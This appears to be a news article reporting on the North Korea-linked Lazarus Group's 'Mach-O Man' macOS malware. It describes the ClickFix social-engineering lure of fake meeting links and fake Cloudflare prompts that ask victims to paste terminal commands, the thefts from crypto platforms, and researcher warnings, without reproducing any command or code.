Lazarus Group, which has recently attracted the attention of those who follow the crypto world closely, is bringing large-scale cyber attacks, formerly identified with the banking sector, to the finance and digital money markets. This cyber group, known to operate in conjunction with the North Korean government, stands out with a total of $6.7 billion in accumulated robberies since 2017. According to recent analysis, Lazarus targeted executives and companies in the fintech and cryptocurrency sectors with the new attack method called Mach-O Man.
Mach-O Man and targeted sectors
Natalie Newson is an expert blockchain security researcher at CertiK and closely examines Lazarus Group’s activities in the crypto and fintech space. Over the last two weeks, the group has managed to withdraw a total of over $500 million in digital assets from the Drift and KelpDAO platforms. In the statement, it was emphasized that the attack wave called Mach-O Man was not a random cyber threat, but an operation carried out officially by North Korea and planned on an institutional scale.
With this new attack method, institutions and senior executives, especially those operating in the field of crypto and finance, are targeted. It is considered that North Korea has turned cryptocurrency theft into a systematic state revenue model. Experts point out that Mach-O Man is used with different variations not only by Lazarus but also by other criminal organizations.
Attack method: ClickFix and social engineering tactics
The most striking feature of the Mach-O Man attack is that it is a modular macOS malware. This malware, developed by Lazarus’ subunit called ‘Chollima’, targets crypto and fintech-oriented applications running on the Apple operating system. Newson states that Mach-O Man was distributed through a social engineering technique called ‘ClickFix’.
In this method, attackers can send urgent meeting invitations to administrators via Telegram. It then redirects victims to a fake website via a link on familiar platforms like Zoom, Microsoft Teams or Google Meet. Victims are informed that there is a connection problem and that they need to paste a specific command into the terminal to fix it. In fact, this command gives attackers direct access to corporate systems and financial resources.
“The page looks real, the instructions are ordinary, and the victims themselves initiate the action, which causes classic security measures to often fail to detect the attack,” Newson said.
New threats to DeFi projects
The Mach-O Man developed by Lazarus causes serious harm at both the institutional and individual levels. DeFi projects in particular are under threat. According to information provided by security threat researcher Vladimir S., attackers took over the domain names of some decentralized finance projects, replaced the websites with fake Cloudflare alerts and demanded commands from visitors.
In these attacks, malicious commands are generally executed under the guise of an “authentication step”. Because the instructions seem realistic, most users or administrators follow the commands without questioning, resulting in full access to the platform’s systems. Malware, on the other hand, deletes itself in a short time and disappears without leaving a trace.
“Most victims are not even aware that they have been attacked. Even if they realize it at the time, it is almost impossible to detect which attack variant has infiltrated their systems,” Newson said.
According to experts, Lazarus’ attacks have recently become more than just a news headline, they have become a source of constant and high-risk threats to the crypto ecosystem. Those operating in the fintech and digital money sectors are recommended to act extra carefully against both technical and social engineering-based attacks in this new period.
